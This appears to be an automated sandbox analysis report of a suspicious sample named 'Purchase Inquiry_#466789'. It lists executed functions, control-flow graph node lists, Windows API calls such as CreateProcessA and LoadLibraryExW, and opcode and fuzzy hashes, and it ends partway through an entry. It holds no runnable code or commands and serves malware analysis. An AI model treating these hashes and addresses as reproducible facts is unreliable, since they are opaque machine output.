20561->20563 20563->20553 20620 116cf80 20621 116cfc6 GetCurrentProcess 20620->20621 20623 116d011 20621->20623 20624 116d018 GetCurrentThread 20621->20624 20623->20624 20625 116d055 GetCurrentProcess 20624->20625 20626 116d04e 20624->20626 20627 116d08b GetCurrentThreadId 20625->20627 20626->20625 20629 116d0e4 20627->20629 20564 59080f8 20565 5908283 20564->20565 20567 590811e 20564->20567 20567->20565 20568 5904100 20567->20568 20569 5908378 PostMessageW 20568->20569 20570 59083e4 20569->20570 20570->20567 20630 1164668 20631 1164672 20630->20631 20633 1164758 20630->20633 20634 116477d 20633->20634 20639 11649ca 20634->20639 20644 1164868 20634->20644 20648 1164858 20634->20648 20635 1164787 20635->20631 20641 11649df 20639->20641 20643 11648d1 20639->20643 20640 11649b8 20640->20635 20641->20635 20643->20640 20652 11644c4 20643->20652 20645 116488f 20644->20645 20646 11649b8 20645->20646 20647 11644c4 CreateActCtxA 20645->20647 20646->20635 20647->20645 20649 116488f 20648->20649 20650 11649b8 20649->20650 20651 11644c4 CreateActCtxA 20649->20651 20650->20635 20651->20649 20653 11658f8 CreateActCtxA 20652->20653 20655 11659bb 20653->20655

                    Executed Functions

                    Function 0116CF80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 294 116cf80-116d00f GetCurrentProcess 298 116d011-116d017 294->298 299 116d018-116d04c GetCurrentThread 294->299 298->299 300 116d055-116d089 GetCurrentProcess 299->300 301 116d04e-116d054 299->301 303 116d092-116d0aa 300->303 304 116d08b-116d091 300->304 301->300 306 116d0b3-116d0e2 GetCurrentThreadId 303->306 304->303 308 116d0e4-116d0ea 306->308 309 116d0eb-116d14d 306->309 308->309
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 0116CFFE
                    • GetCurrentThread.KERNEL32 ref: 0116D03B
                    • GetCurrentProcess.KERNEL32 ref: 0116D078
                    • GetCurrentThreadId.KERNEL32 ref: 0116D0D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673802580.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1160000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: Current$ProcessThread
                    • String ID: NwiE
                    • API String ID: 2063062207-3115903798
                    • Opcode ID: 04033a46db16511ac31f89b335f8248bb7d80df86313baf7e1c046c049c27411
                    • Instruction ID: 755d74efbc94ecbea6d0c653e06f511557328505626d579670129870857b8c11
                    • Opcode Fuzzy Hash: 04033a46db16511ac31f89b335f8248bb7d80df86313baf7e1c046c049c27411
                    • Instruction Fuzzy Hash: 7F5156B0A00249CFDB18CFA9D948B9EBBF5AF48304F20C559E459A7260C7359984CF65
                    Function 05905FD4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 315 5905fd4-5906075 317 5906077-5906081 315->317 318 59060ae-59060ce 315->318 317->318 319 5906083-5906085 317->319 325 59060d0-59060da 318->325 326 5906107-5906136 318->326 320 5906087-5906091 319->320 321 59060a8-59060ab 319->321 323 5906093 320->323 324 5906095-59060a4 320->324 321->318 323->324 324->324 327 59060a6 324->327 325->326 328 59060dc-59060de 325->328 332 5906138-5906142 326->332 333 590616f-5906229 CreateProcessA 326->333 327->321 330 59060e0-59060ea 328->330 331 5906101-5906104 328->331 334 59060ec 330->334 335 59060ee-59060fd 330->335 331->326 332->333 336 5906144-5906146 332->336 346 5906232-59062b8 333->346 347 590622b-5906231 333->347 334->335 335->335 337 59060ff 335->337 338 5906148-5906152 336->338 339 5906169-590616c 336->339 337->331 341 5906154 338->341 342 5906156-5906165 338->342 339->333 341->342 342->342 343 5906167 342->343 343->339 357 59062c8-59062cc 346->357 358 59062ba-59062be 346->358 347->346 360 59062dc-59062e0 357->360 361 59062ce-59062d2 357->361 358->357 359 59062c0 358->359 359->357 363 59062f0-59062f4 360->363 364 59062e2-59062e6 360->364 361->360 362 59062d4 361->362 362->360 366 5906306-590630d 363->366 367 59062f6-59062fc 363->367 364->363 365 59062e8 364->365 365->363 368 5906324 366->368 369 590630f-590631e 366->369 367->366 371 5906325 368->371 369->368 371->371
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05906216
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: NwiE$NwiE
                    • API String ID: 963392458-3150609333
                    • Opcode ID: 62887f09675f4ec012617759982891725250d6649cd3b6c4eb2106f82d9bbe4d
                    • Instruction ID: 2d0b311db6d8f7e983c895a7378339b46160bdf2abb3ad9663a6db68c5d0b411
                    • Opcode Fuzzy Hash: 62887f09675f4ec012617759982891725250d6649cd3b6c4eb2106f82d9bbe4d
                    • Instruction Fuzzy Hash: BDA16A71D00219DFDF24CFA8C841BEEBBB6BF49314F1485A9E809A7280DB749995CF91
                    Function 05905FE0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 372 5905fe0-5906075 374 5906077-5906081 372->374 375 59060ae-59060ce 372->375 374->375 376 5906083-5906085 374->376 382 59060d0-59060da 375->382 383 5906107-5906136 375->383 377 5906087-5906091 376->377 378 59060a8-59060ab 376->378 380 5906093 377->380 381 5906095-59060a4 377->381 378->375 380->381 381->381 384 59060a6 381->384 382->383 385 59060dc-59060de 382->385 389 5906138-5906142 383->389 390 590616f-5906229 CreateProcessA 383->390 384->378 387 59060e0-59060ea 385->387 388 5906101-5906104 385->388 391 59060ec 387->391 392 59060ee-59060fd 387->392 388->383 389->390 393 5906144-5906146 389->393 403 5906232-59062b8 390->403 404 590622b-5906231 390->404 391->392 392->392 394 59060ff 392->394 395 5906148-5906152 393->395 396 5906169-590616c 393->396 394->388 398 5906154 395->398 399 5906156-5906165 395->399 396->390 398->399 399->399 400 5906167 399->400 400->396 414 59062c8-59062cc 403->414 415 59062ba-59062be 403->415 404->403 417 59062dc-59062e0 414->417 418 59062ce-59062d2 414->418 415->414 416 59062c0 415->416 416->414 420 59062f0-59062f4 417->420 421 59062e2-59062e6 417->421 418->417 419 59062d4 418->419 419->417 423 5906306-590630d 420->423 424 59062f6-59062fc 420->424 421->420 422 59062e8 421->422 422->420 425 5906324 423->425 426 590630f-590631e 423->426 424->423 428 5906325 425->428 426->425 428->428
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05906216
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: NwiE$NwiE
                    • API String ID: 963392458-3150609333
                    • Opcode ID: 3105f058f4d4170341e955e34332ab53bbb08b6508d57350320bb86b730cd1ee
                    • Instruction ID: 1037927afc8af81f606f8f6161e74863dc365e4c754f00695e0efbecb4110315
                    • Opcode Fuzzy Hash: 3105f058f4d4170341e955e34332ab53bbb08b6508d57350320bb86b730cd1ee
                    • Instruction Fuzzy Hash: 04916971D00219DFDF24CFA9C841BEEBBB6BF49310F1485A9E808A7280DB749995CF91
                    Function 0116ACE8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 499 116ace8-116acf7 500 116ad23-116ad27 499->500 501 116acf9-116ad06 call 116a00c 499->501 503 116ad3b-116ad7c 500->503 504 116ad29-116ad33 500->504 506 116ad1c 501->506 507 116ad08 501->507 510 116ad7e-116ad86 503->510 511 116ad89-116ad97 503->511 504->503 506->500 556 116ad0e call 116af70 507->556 557 116ad0e call 116af80 507->557 510->511 512 116adbb-116adbd 511->512 513 116ad99-116ad9e 511->513 518 116adc0-116adc7 512->518 515 116ada0-116ada7 call 116a018 513->515 516 116ada9 513->516 514 116ad14-116ad16 514->506 517 116ae58-116af18 514->517 520 116adab-116adb9 515->520 516->520 549 116af20-116af4b GetModuleHandleW 517->549 550 116af1a-116af1d 517->550 521 116add4-116addb 518->521 522 116adc9-116add1 518->522 520->518 524 116addd-116ade5 521->524 525 116ade8-116adf1 call 116a028 521->525 522->521 524->525 530 116adf3-116adfb 525->530 531 116adfe-116ae03 525->531 530->531 532 116ae05-116ae0c 531->532 533 116ae21-116ae25 531->533 532->533 535 116ae0e-116ae1e call 116a038 call 116a048 532->535 554 116ae28 call 116b250 533->554 555 116ae28 call 116b280 533->555 535->533 538 116ae2b-116ae2e 540 116ae30-116ae4e 538->540 541 116ae51-116ae57 538->541 540->541 551 116af54-116af68 549->551 552 116af4d-116af53 549->552 550->549 552->551 554->538 555->538 556->514 557->514
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0116AF3E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673802580.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1160000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID: NwiE
                    • API String ID: 4139908857-3115903798
                    • Opcode ID: abb6d4bf061a59b3c6ebb697ebec483629bd1bfb97d61a40b8611f8c5c341bde
                    • Instruction ID: 6c5d2b6a668d01c03044635174e20b8ec9776f963dfb1f419015be36467e5c1b
                    • Opcode Fuzzy Hash: abb6d4bf061a59b3c6ebb697ebec483629bd1bfb97d61a40b8611f8c5c341bde
                    • Instruction Fuzzy Hash: 9F814970A00B058FD728DF69E44175ABBF5FF88304F00892DD486E7A50D776E959CB91
                    Function 05904110 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 558 5904110-5904138 561 5904100-59083e2 PostMessageW 558->561 562 590413a-5908b32 558->562 565 59083e4-59083ea 561->565 566 59083eb-59083ff 561->566 567 5908b34 562->567 568 5908b39-5908b6f 562->568 565->566 567->568 572 5908b71 568->572 573 5908b79 568->573 572->573 574 5908b7a 573->574 574->574
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 059083D5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: MessagePost
                    • String ID: NwiE
                    • API String ID: 410705778-3115903798
                    • Opcode ID: c9ecebc8cbc7ff9a1c40b26be9ebf15c040c6ee11504e1436003f207e53df9dc
                    • Instruction ID: c1c9eb8fd57a1ff272c911c25372923fa9b22d3ee0e4ce97cd4e5f2c9cc6af23
                    • Opcode Fuzzy Hash: c9ecebc8cbc7ff9a1c40b26be9ebf15c040c6ee11504e1436003f207e53df9dc
                    • Instruction Fuzzy Hash: 9F4188B0A043589FDB10DF99D894ADEBFF8EF48310F14486AE495A7291D774A884CFA4
                    Function 011644C4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 575 11644c4-11659b9 CreateActCtxA 578 11659c2-1165a1c 575->578 579 11659bb-11659c1 575->579 586 1165a1e-1165a21 578->586 587 1165a2b-1165a2f 578->587 579->578 586->587 588 1165a40 587->588 589 1165a31-1165a3d 587->589 591 1165a41 588->591 589->588 591->591
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 011659A9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673802580.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1160000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: Create
                    • String ID: NwiE
                    • API String ID: 2289755597-3115903798
                    • Opcode ID: 785e11863e5d86d6fc9d3da781c1877199631d76c809df96818d09b1f393bc0a
                    • Instruction ID: 43f8bd54efd77165991390f67e0040c80a0734101a40be9f0189792a8be5e7a2
                    • Opcode Fuzzy Hash: 785e11863e5d86d6fc9d3da781c1877199631d76c809df96818d09b1f393bc0a
                    • Instruction Fuzzy Hash: C841E5B0C0071DCBDB28DFAAC84479DBBBABF49304F248069D408BB255DB755945CF90
                    Function 011658F4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 592 11658f4-11659b9 CreateActCtxA 594 11659c2-1165a1c 592->594 595 11659bb-11659c1 592->595 602 1165a1e-1165a21 594->602 603 1165a2b-1165a2f 594->603 595->594 602->603 604 1165a40 603->604 605 1165a31-1165a3d 603->605 607 1165a41 604->607 605->604 607->607
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 011659A9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673802580.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1160000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: Create
                    • String ID: NwiE
                    • API String ID: 2289755597-3115903798
                    • Opcode ID: fcc349048e166ce24002246b668098309cec8e468d5d83db2aa52ac88e2da764
                    • Instruction ID: f7c2d562a366b6559965339d0fbc2f589208249a418b7395cd16c4e494bf6d48
                    • Opcode Fuzzy Hash: fcc349048e166ce24002246b668098309cec8e468d5d83db2aa52ac88e2da764
                    • Instruction Fuzzy Hash: 8E41C2B0C00719CBDB28DFAAC884B8DBBBABF49304F24806AD409BB255DB755945CF90
                    Function 0116D5D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 608 116d5d0-116d664 DuplicateHandle 609 116d666-116d66c 608->609 610 116d66d-116d68a 608->610 609->610
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0116D657
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673802580.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1160000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID: NwiE
                    • API String ID: 3793708945-3115903798
                    • Opcode ID: cc8624ea7123039d40f233a1921fc21cc2d0332c0c800b6d86ce3c6dc540d1f9
                    • Instruction ID: 1cf1434cc017d0276637e77511ca42b5b4340c390646b6f5429aec684b4abded
                    • Opcode Fuzzy Hash: cc8624ea7123039d40f233a1921fc21cc2d0332c0c800b6d86ce3c6dc540d1f9
                    • Instruction Fuzzy Hash: 2321E4B59002589FDB10CF9AD984ADEBFF8EB48320F14801AE958A7310C375A950CFA5
                    Function 0116A070 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 613 116a070-116b1a0 615 116b1a2-116b1a5 613->615 616 116b1a8-116b1d7 LoadLibraryExW 613->616 615->616 617 116b1e0-116b1fd 616->617 618 116b1d9-116b1df 616->618 618->617
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0116AFB9,00000800,00000000,00000000), ref: 0116B1CA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673802580.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1160000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: NwiE
                    • API String ID: 1029625771-3115903798
                    • Opcode ID: 721999da98f9efd0ff24b380ebc5ba3c3e8a16cd97ce17e46f3c0611cc625bc4
                    • Instruction ID: 7a3ef411b32ca31c6cdc3ef04a19d7b3d2a3ae3ab71698ee02d23deed6c85efc
                    • Opcode Fuzzy Hash: 721999da98f9efd0ff24b380ebc5ba3c3e8a16cd97ce17e46f3c0611cc625bc4
                    • Instruction Fuzzy Hash: 2811F9B6D04349DFDB14CF9AD544ADEFBF8EB48310F10842AE515A7210C375A545CFA5
                    Function 0116B159 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 621 116b159-116b1a0 622 116b1a2-116b1a5 621->622 623 116b1a8-116b1d7 LoadLibraryExW 621->623 622->623 624 116b1e0-116b1fd 623->624 625 116b1d9-116b1df 623->625 625->624
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0116AFB9,00000800,00000000,00000000), ref: 0116B1CA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673802580.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1160000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: NwiE
                    • API String ID: 1029625771-3115903798
                    • Opcode ID: 237a3f504522591e55964a245a58e9af93dcf44599a2ff80d63a47f7c6b85b32
                    • Instruction ID: f8183a85be5d30ee239748dfe0f8c5b342fa83393752e1c9a301012af39a43d8
                    • Opcode Fuzzy Hash: 237a3f504522591e55964a245a58e9af93dcf44599a2ff80d63a47f7c6b85b32
                    • Instruction Fuzzy Hash: 291126B6900249DFDB14CFAAD844ADEFFF4EF88320F10842AD919A7210C379A545CFA5
                    Function 0116AED8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 628 116aed8-116af18 629 116af20-116af4b GetModuleHandleW 628->629 630 116af1a-116af1d 628->630 631 116af54-116af68 629->631 632 116af4d-116af53 629->632 630->629 632->631
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0116AF3E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673802580.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1160000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID: NwiE
                    • API String ID: 4139908857-3115903798
                    • Opcode ID: 9f50cb3ad898bbdbb5bb7f04b28f71cfe559662080dd3a8b5a61a62d4b12b2d1
                    • Instruction ID: 45484430ae1402c5f301834c02fd531f2adf7261914caaa66a6b5c8ea35c1171
                    • Opcode Fuzzy Hash: 9f50cb3ad898bbdbb5bb7f04b28f71cfe559662080dd3a8b5a61a62d4b12b2d1
                    • Instruction Fuzzy Hash: 5A1110B6C002498FDB24CF9AD444ADEFBF8EF88324F10846AD558B7250C379A545CFA2
                    Function 05904100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 634 5904100-59083e2 PostMessageW 636 59083e4-59083ea 634->636 637 59083eb-59083ff 634->637 636->637
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 059083D5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: MessagePost
                    • String ID: NwiE
                    • API String ID: 410705778-3115903798
                    • Opcode ID: 244026b0c3dd35a40f29a1b12f46f9364bcfad1fd867424727e5fcaf2bddeeba
                    • Instruction ID: 27a20574a11f0843e520ff6b0813bcac147d606b3e387d76cff3c508eaedfd94
                    • Opcode Fuzzy Hash: 244026b0c3dd35a40f29a1b12f46f9364bcfad1fd867424727e5fcaf2bddeeba
                    • Instruction Fuzzy Hash: D811F5B5904349DFCB20DF99C444BDEFBF8EB48324F108819E554A7250C375A944CFA5
                    Function 05908370 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44windowCOMMON
                    Download Yara Rule
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 059083D5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID: MessagePost
                    • String ID: NwiE
                    • API String ID: 410705778-3115903798
                    • Opcode ID: aee8c1f8aa4dda2d1b4053ae2c5036a9ff763d6b96bfdfb1facd47563de9eef1
                    • Instruction ID: 229e746cc4eae3366fd4b359f53d869259eaf35d1282152c2ef3ea7e621f9589
                    • Opcode Fuzzy Hash: aee8c1f8aa4dda2d1b4053ae2c5036a9ff763d6b96bfdfb1facd47563de9eef1
                    • Instruction Fuzzy Hash: 6911E0B5900249CFCB10CF99D589BDEFBF8EB48324F10881AD558A7650C374A584CFA0
                    Function 00EAD4C4 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673411389.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ead000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2b7a23868ed9c591f942098a985b1f412bf18564dda24968f2eb51f72d16ab09
                    • Instruction ID: 145e85cf5498d59beada81f2d235691d9ff64337e66f55962b394b3cecd90237
                    • Opcode Fuzzy Hash: 2b7a23868ed9c591f942098a985b1f412bf18564dda24968f2eb51f72d16ab09
                    • Instruction Fuzzy Hash: 82213371908200DFCB01DF14D9C0B2ABFA5FB9C318F20C569E80A1F656C336E856CAA1
                    Function 00EAD3D8 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673411389.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ead000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 892bbd30bc6ecfc21fb0406200538ccae9f5a447d54c0461861b58ca82ca5d1b
                    • Instruction ID: 147e9adf33d01a9aaece2141089f53b425481c9ab4f425fedd02db590f39822f
                    • Opcode Fuzzy Hash: 892bbd30bc6ecfc21fb0406200538ccae9f5a447d54c0461861b58ca82ca5d1b
                    • Instruction Fuzzy Hash: 45213671108204DFDB00DF04C9C0B1ABF65FB9C324F20C169D80A5F656C336F856C6A1
                    Function 00EBD01C Relevance: .1, Instructions: 72COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673448199.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ebd000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d0ddea6f4141cf8f14ebd7d4d82199d9aa5b7866ddcaf642442919db2ca04a66
                    • Instruction ID: 624c97ea8905650674b5a68d6290c8e1a430d1aa06d561822802413e93c4ee0e
                    • Opcode Fuzzy Hash: d0ddea6f4141cf8f14ebd7d4d82199d9aa5b7866ddcaf642442919db2ca04a66
                    • Instruction Fuzzy Hash: 6D210475608200DFCB14EF14D9C4B67BFA6FB88318F24C56DD84A5B296D33AD847CA61
                    Function 00EBD005 Relevance: .1, Instructions: 62COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673448199.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ebd000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14acfc0da0d8d3aa18ad883a48d7669a389db2a4b5da51fe537475ac27c6d9b4
                    • Instruction ID: 4f1cb432e4cf66e8658b757a8bd1b0f1aa87acc53dfe0690c4172bb2b4ff3e85
                    • Opcode Fuzzy Hash: 14acfc0da0d8d3aa18ad883a48d7669a389db2a4b5da51fe537475ac27c6d9b4
                    • Instruction Fuzzy Hash: 5521837550D3808FCB02DF24D994756BF71EB46314F28C5DAD8498F2A7C33A980ACB62
                    Function 00EAD4BF Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673411389.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ead000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                    • Instruction ID: 0c472fd4683b1baa01656824ec21cec94073bd40d2e19a09d5aca97a2bc3d5d3
                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                    • Instruction Fuzzy Hash: FF11D676904240CFCB15CF14D9C4B16BF71FB98318F24C5A9D8454F656C336E456CB91
                    Function 00EAD3D3 Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673411389.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ead000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                    • Instruction ID: c153858c3fdcf4bd11069e470debd0401b4b94b8770fa7ce82a40f5f225332ad
                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                    • Instruction Fuzzy Hash: 2D110376404240CFDB12CF00D9C4B16BF71FB98328F24C2A9D80A0F656C33AE85ACBA1

                    Non-executed Functions

                    Function 0590A0A0 Relevance: .4, Instructions: 364COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 87a67d279fc6f3c2235d17a6a261d36481f145fdb48889cb3a51098e826f2f63
                    • Instruction ID: 84b1126bf1d4cde4fdc8de0c465883d065f8e0d74009078948b7a852cf6b9be1
                    • Opcode Fuzzy Hash: 87a67d279fc6f3c2235d17a6a261d36481f145fdb48889cb3a51098e826f2f63
                    • Instruction Fuzzy Hash: E9D1AA707057018FDB29DB79C450BAEB7FAAFC9204F144869D146DB6E1DB36E802CB91
                    Function 05902F98 Relevance: .3, Instructions: 312COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: da30be257c63fe6f7c204bbe6db4c866f9a12de72e1598e7cd899cdda33fb1e7
                    • Instruction ID: b3cfe1996bd64f9d09bc9a2db79a586d14cf8abc27cd092462f0aa110d708b65
                    • Opcode Fuzzy Hash: da30be257c63fe6f7c204bbe6db4c866f9a12de72e1598e7cd899cdda33fb1e7
                    • Instruction Fuzzy Hash: F2E11974E041198FDB14DFA9C5809AEFBB2FF89305F249569E414AB356DB30AD41CF60
                    Function 05904EB0 Relevance: .3, Instructions: 312COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
